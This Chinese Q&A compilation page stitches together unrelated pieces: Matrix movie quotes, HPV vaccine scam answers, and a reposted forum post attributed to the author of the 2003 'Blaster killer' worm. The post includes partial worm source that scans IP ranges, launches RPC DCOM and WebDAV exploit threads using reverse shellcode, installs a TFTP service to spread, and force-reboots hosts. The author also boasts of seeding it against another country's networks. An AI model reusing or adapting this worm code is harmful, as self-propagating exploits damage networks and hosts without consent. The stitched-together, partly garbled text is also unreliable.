在《黑客帝国》里的问题?
那段话是:我知道你了。我现在能感觉到你。我知道你害怕。你是怕我们。你害怕改变。我不知道未来。我来到这里告诉你,游戏开始了。我要挂断这个电话,然后我要向这些人展示你不想让他们看到的东西。我会向他们展示世界上没有你,世界上没有规则和控制,无国界或疆界,世界上任何事都是可能的。
门代表程序的后门
黑客攻击电脑,就是要找到程序的后门也就是漏洞
经典台词有
1. 人在这世界里,有许多事情是我们一定得做的。
2. 没有使命,人类就不会存在,是使命创造了我们,但使命联系着我们、牵引着我们、指引着我们、推动着我们、约束了我们。
3. 这世界这世界只存在着一种永恒,一种广泛适用的真理,仅用的真实:因果关系。比如:行动与回应 起因与结果。
4. 任何事情都始于当初的选择。
5. 选择是有权利与没有权利者之间的不平衡。
6. 新的感觉作成的一种假象,首先,不明白为什么,很快这些“为什么”与“原因”却将消失,最重要的是感觉本身,我们虽然强烈挣扎、拼命地抵抗它,自欺欺人的装出没事,在那泰然自若的外表下,事实上,我们已彻底地失控了,这是自然界的定律。这就是因果,无法避免的,我们永远受它的奴役。
7. 我们只能试图去理解,理解为什么———“因果关系”
8. “原因”是我们与他们的区别,是真正力量的源泉。
9. 每个人都是因果关系的受害者。
10. 该发生的事情都发生了,没有其他的变数。
11. 美好的事情注定是不长久的。
12. 一切都是命中注定的。
13. 问题的关键在与选择。
14. 一个胜利的同时,也是一个不朽的失败。
15. 无法避免的毁灭是显而易见的,人类天生的不完美是造成的结果。
16. 问题的关键只在于选择,接下来就回发生的连锁反应。
17. 希望是人类自欺欺人的精髓,他既是强大的力量来源,同时也是人类致命的弱点。
Everything has a beginning has an end
万物有始亦有终
黑客1,史密斯经典台词:
当我在母体时,我曾经仔细研究过你们人类的历史,我很愿意和你交流一下我研究的心得:我发现你们人类并非哺乳动物。任何哺乳动物都会努力保持自身和自然的平衡,而你们人类,每到一处就拼命开发,耗尽所有资源后就迁往他处。在这个星球上只有一种生物也采用这种生存方式――病毒。人类,是种疾病,你们是地球的癌症和瘟疫。而我们则是疫苗……
有没有黑客能给录制接种疫苗
没有。
接种HPV疫苗要前往社区卫生服务中心等正规机构进行预约,切记不要盲目相信个人中介,更不要贪图便宜购买“特价疫苗”,确保准时接种完三针才最重要。
重庆一护士骗上百人打内部HPV疫苗,最终是如何被发现的?
最终是被人民群众举报发现的。这位护士骗上百人打HPV疫苗,打完后有的人发现在正规机构查不到记录,心中起疑,后来事情闹大了警方介入。
新一轮“疫苗诈骗”来袭,我们该如何警惕此类骗局?
不要出现恐慌心理,冷静下来及时找家人沟通。多多关注官方发布的消息,不要轻易相信陌生短信发来的链接。
《冲击波杀手》那个黑客是谁?
这个问题警察也想知道 也没人在网上公布
给您转一篇文章 也许对您有用
冲击波杀手的作者网上现身
前言:“冲击波”蠕虫爆发后,大量个人主机及服务器遭受侵袭,各大安全公司,杀毒厂商纷纷推出各种解决方案,不料短短几日内,又出现了来历不明的新蠕虫,经过一些安全专家的反向编译和分析,惊讶的发现,该蠕虫的工作目标居然是消灭冲击波蠕虫并自动为受害主机进行补丁,而且该蠕虫还具有定时自毁功能,显然作者的目标还是有一定的善意因素,但是蠕虫毕竟是蠕虫,因为大量icmp包的发送,还是能够给企业局域网络带来极大的压力,就此,对蠕虫的危害性依然要保持极大的关注和警惕,相关文章可以参见
http://www.donews.com/donews/article/5/50423.html
8月20日,蠕虫作者突然现身,出现在某安全论坛,以下是该作者论坛上声明的转载,并公开了源代码。
下文为作者自述-转自某安全论坛
玩过了~~ 虫虫四个小时之内已经完成了任务~~~ 不得不写这豆腐块~~~
char *szMe = "=========== I love my wife baby ~~~ Welcome Chian~~~
Notice: 2004 will remove myself~~ sorry zhongli~~~=========== wins";
偶:小地方小公司小小程序员
偶从不玩安全的,临时抱佛脚,看了些资料,仓促写了这个烂虫虫~~~
A 看不惯老外小鸟儿写的什么什么波的烂虫~~ ,虽然偶临时玩安全的即兴之作亦很烂
~~~
B 看不惯国内某几家放毒公司的商业炒作,发网难财,违背良心,误导民众
偶就帮你丫的除光了虫虫,打光了补丁,没想到他丫的误导的更变态~~~ 你丫的方脑壳
~~
C 帮偶不认识的 flashsky 兄解脱些吧~~~ 他丫的 Bill该死,快去谢flashsky~~~
D VirusBOy 兄,baby 可不是情人吆,偶家小子两岁就开始跟偶抢机器了~~
E 长了这么大,算首次报效社会吧~~~
F 几年?进去就是了,不就是个坐吗, 切~~~ 偶是吓大的!
======================================================
0 chian 系 china 笔误~~ 敲的快了,某个指头先到~~~
1 早在 8/13 国际国内骨干路由就丢弃了 135 syn ,只有加入WebDav才玩得转~~~
2 RpcDcom WebDav 使用同一 反向shellcode, 用 eyas的, lion修改
(声明:谁也没给偶,偶从一被人遗忘的公开程序中sniffer的,谢两位)
此shellcode 新进程建在svchost下,就一个Call Ebx 通杀了 all 2k xp
他丫的,还有放毒公司言导致xp机器重启云云的~~~
3 Bill该死 有 Tftpd.exe, 干吗不用,虽然偶看过 Tftp 协议,练习写过~~~
4 某年某月某日某时某刻,
溜出国门,辗转借了几台 Xeon™ 4 cpus, 2g memory 机器
架起 2000 线程的 WebDav 投放玩具,对准某国骨干的几个B段
10 分钟内投放了三四百个种子(早知道有这么多,就换个玩法 ~~~
5 发icmp包是为了提高搜索效率,算唯一的危害了~~~ 刺激一下也好~~~
打补丁的虫,杀虫的虫,再不有点儿小危害就丢尽了虫虫家族的脸~~~
//偶婆婆, 烂代码~~~ 将就看吧~~~
BOOL DoServicePackFunction()
{
DWORD nSystemVer = Win2000OrXp();
if ( !( nSystemVer == 0 || nSystemVer == 1) )
return FALSE; // not 2k or xp
if ( ReadRegServicePack(nSystemVer) )
return FALSE; //已经安装了
//识别语言版本
int nLanguageID;
unsigned int unOemCP = GetOEMCP();
LCID lcid = GetSystemDefaultLCID();
WORD wMain = PRIMARYLANGID(lcid);
WORD wSub = SUBLANGID(lcid);
if ( unOemCP == 437 wMain == 9 wSub == 1 ) //en
nLanguageID = 0; //打了你丫的en补丁就不错了~~ 还唧唧歪歪的~~
//管不了小欧洲~~ 俄罗斯牛人有自己的玩法
~~
else if ( unOemCP == 936 wMain == 4 wSub == 2 ) //cn
nLanguageID = 1; //就是为这个来的~~
else if ( unOemCP == 950 wMain == 4 wSub == 1 ) //tw
nLanguageID = 2; //同胞骨肉的忙,一定要帮~~
else if ( unOemCP == 932 wMain == 0x11 wSub == 1 ) //jp
nLanguageID = -1; //偶好有干掉鬼子机器的冲动!
//罢了,冤冤相报何时了~~~ 希望他丫的自新
~~~ 再玩火就灭了他丫的~~
else if ( unOemCP == 949 wMain == 0x12 wSub == 1 ) //kr
nLanguageID = 3; //少些不懂事的小鸟儿弯出去, 危害国内~~
else{
nLanguageID = -1;
}
if ( nLanguageID == -1)
return FALSE;
char szServicePack[] = "RpcServicePack.exe";
// downlaod it~~~
if ( !nSystemVer ) { // 2k
if ( !DownloadSpFile (szServicePack, szWin2kSpUrl[nLanguageID]) )
return FALSE;
}
else{
if ( !DownloadSpFile (szServicePack, szWinXPSpUrl[nLanguageID]) )
return FALSE;
}
char szExec[180];
sprintf(szExec, "%s -n -o -z -q", szServicePack);
HANDLE hProcess = MakeProcess( szExec );
if ( hProcess == NULL )
return FALSE;
if (WaitForSingleObject(hProcess, 360000) != WAIT_OBJECT_0 ){ //六分钟内
未完成
TerminateProcess(hProcess,1);
CloseHandle(hProcess);
DeleteFile(szServicePack);
return FALSE;
}
CloseHandle(hProcess);
Sleep(15000);
DeleteFile(szServicePack);
if ( ReadRegServicePack(nSystemVer) ) {
ShutDownWindows( EWX_REBOOT | EWX_FORCE );//install service pack ok, reboot
it~~~
Sleep(20000); //说偶重启有过? 不重启补丁无效,
找 Bill该死 说去~~~
}
return TRUE;
}
// IN: 始ip, B段数量, 是否随机,是否换WebDav //更烂~~~ 凑合着看~~~
void BeginExploitFunction(u_long ulIpStart, int nBCount, BOOL bRand, BOOL
bWebDav)
{
HANDLE hThread = NULL;
BOOL bFirst = TRUE;
u_long uComp;
for (int i=0;i (nBCount * 256 * 256); i++){
if ( bRand )
uComp = MakeRandIp();
else
uComp = i + ulIpStart;
if ( //还是屏蔽掉部分目标,免得目标中招后,再玩就把下一代干掉了,不破坏的好
~~~
(BYTE)uComp == 0xc5 ||
(BYTE)(uComp8) == 0xc5 ||
(BYTE)(uComp16) == 0xc5 ||
(BYTE)(uComp24) == 0xc5 ||
(WORD)uComp == 0x9999 ||
(WORD)(uComp8) == 0x9999 ||
(WORD)(uComp16) == 0x9999 )
continue;
u_long *myPara = new u_long;
if ( myPara == NULL ){//如果分配失败,再尝试一次
Sleep(100);
myPara = new u_long;
}
if ( myPara ){
if ( hThread )
CloseHandle(hThread);
*myPara = htonl( uComp);
DWORD dwThreadId;
if (bWebDav)
hThread =
CreateThread(NULL,0,ExploitWebDavThread,(LPVOID)myPara,0,dwThreadId);
else
hThread =
CreateThread(NULL,0,ExploitRpcDcomThread,(LPVOID)myPara,0,dwThreadId);
Sleep(2);
}
//添加此处代码,避免首次执行时,线程中的
InterlockedIncrement(g_CurThreadCount) 未来得及运行,一次性建立了N个线程的
bug!
if ( bFirst (i = nMaxThread) ){
Sleep(2000);
bFirst = FALSE;
}
while(g_CurThreadCount = nMaxThread) // #define nMaxThread 300 ,不小心,
玩过了~~~
Sleep(2);
}
Sleep(60000);
}
//服务模式和控制台模式公用主程序
void DoIt()
{
WSADATAwsd;
if(WSAStartup(MAKEWORD(2,2),wsd)!=0)
return;
//杀蠕虫
KillMsblast();
//卸载
SYSTEMTIME st;
GetLocalTime(st);
if ( st.wYear == 2004 ){
MyDeleteService(szServiceName);
MyDeleteService(szServiceTftpd);
RemoveMe();
ExitProcess(1); //其实不必,RemoveMe()中借用了前辈的代码,2k下,退出程序时将
自身文件删除了
}
srand( GetTickCount() );
memset(pPingBuffer, '\xAA', sizeof(pPingBuffer));
//烦请骨干路由器立即丢弃此特征 Icmp Echo 包! 国内的什么什么波已经绝了!~~ 补
丁已经打够了!~~~
//准备WebDav发送缓冲区
do{
pWebDavExploitBuffer = new char[68000];
Sleep(100);
}while(pWebDavExploitBuffer == NULL);
//必须在checkonlien 之前,一次装配好子弹
PressWebDavBufferOnce();
PressRpcDcomBufferOnce();
CheckOnlienAndPressData(); //get LocalIp 修正子弹中的反向ip 和 端口
//打补丁
DoServicePackFunction();
//建立接收线程
DWORD dwThreadID;
HANDLE
hWorkThread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)RecvSendCmdThread,(L
PVOID)NULL,0,dwThreadID);
if(hWorkThread==NULL) // RecvSendCmdThread 中阻塞,有反连,再建线程处理之,
同时处理多个反连
return;
CloseHandle(hWorkThread);
if ( !MyStartService(szServiceTftpd) ){
Sleep(1000);
InstallTftpService();
Sleep(1000);
MyStartService(szServiceTftpd);
}
Sleep(2000); //等待接收线程中的全局 rand bind port
u_long ulIP;
for(;{ //估算了一下,普通机器2小时一循环
//首先扫描本ip段
CheckOnlienAndPressData();
ulIP = ntohl(inet_addr(szLocalIp));
ulIP = 0xffff0000;
BeginExploitFunction( ulIP, 1, 0, 0);
//再扫描本ip前后3个段
CheckOnlienAndPressData();
if ( rand() % 2)
ulIP += 0x00010000;
else
ulIP -= 0x00030000;
BeginExploitFunction( ulIP, 3, 0, 0);
//再扫描WebDav一个段,跳出 135 syn封锁
CheckOnlienAndPressData();
ulIP = MAKELONG(0, wdIpHead[ rand()% 76 ]); //请 wdIpHead[] B段IP商注意~~~,
立即采取补救措施~~~ sorry~~~
BeginExploitFunction( ulIP, 1, 0, 1);
//再扫描随机的IP, 数量1个 B段, rpc or webdav
CheckOnlienAndPressData();
if ( rand() % 2)
BeginExploitFunction( ulIP, 1, 1, 0);
else
BeginExploitFunction( ulIP, 1, 1, 1); //偶跳、跳、跳~~~
KillMsblast();
}
//WSACleanup();
}
--------------------------------------------------------------------------------------------------
为方便阅读,增加几个补充说明
1.flashsky www.xfocus.net创始人之一,启明星辰安全专家,擅长古体诗词,7月中公开rpc漏洞利用方式源代码,公开溢出分析报告,造成全球安全领域的震动,冲击波蠕虫的主要传播技术来源于这位高手公开的技术描述。
2.VirusBOy 懂点安全的小朋友,水平不咋地,不过你最好别招惹他,DDOS你一把也够受的。
3.某安全公司安全专家评论,该帖子内容基本属实,蠕虫源代码已经得到确认。
瑞星反病毒检测中心今晚再次截获利用微软RPC漏洞进行传播的病毒。不过,这个新病毒生来就是原冲击波病毒的克星。
瑞星反病毒工程师分析说:该病毒的特点是将“冲击波”(Worm.Blaster)病毒干掉,并在系统内值入,预防冲击波病毒的疫苗。
然后这个新病毒会尝试从微软网站下载补丁并自动将受感染的系统打上补丁。然后该病毒会开启数百个的线程PING其它IP地址,并通过RPC漏洞快速传播自己,消耗大量CPU和网络资源,并且有可能会导致系统死机。该病毒的作者似乎无意作恶,病毒设定在2004年自行毁灭。
由于该病毒采用PING方式进行探测,只感染能够PING通的机器,因此瑞星反病毒工程师提醒广大用户,设置防火墙的规则,禁止ping,这样可以有效防止该病毒的入侵。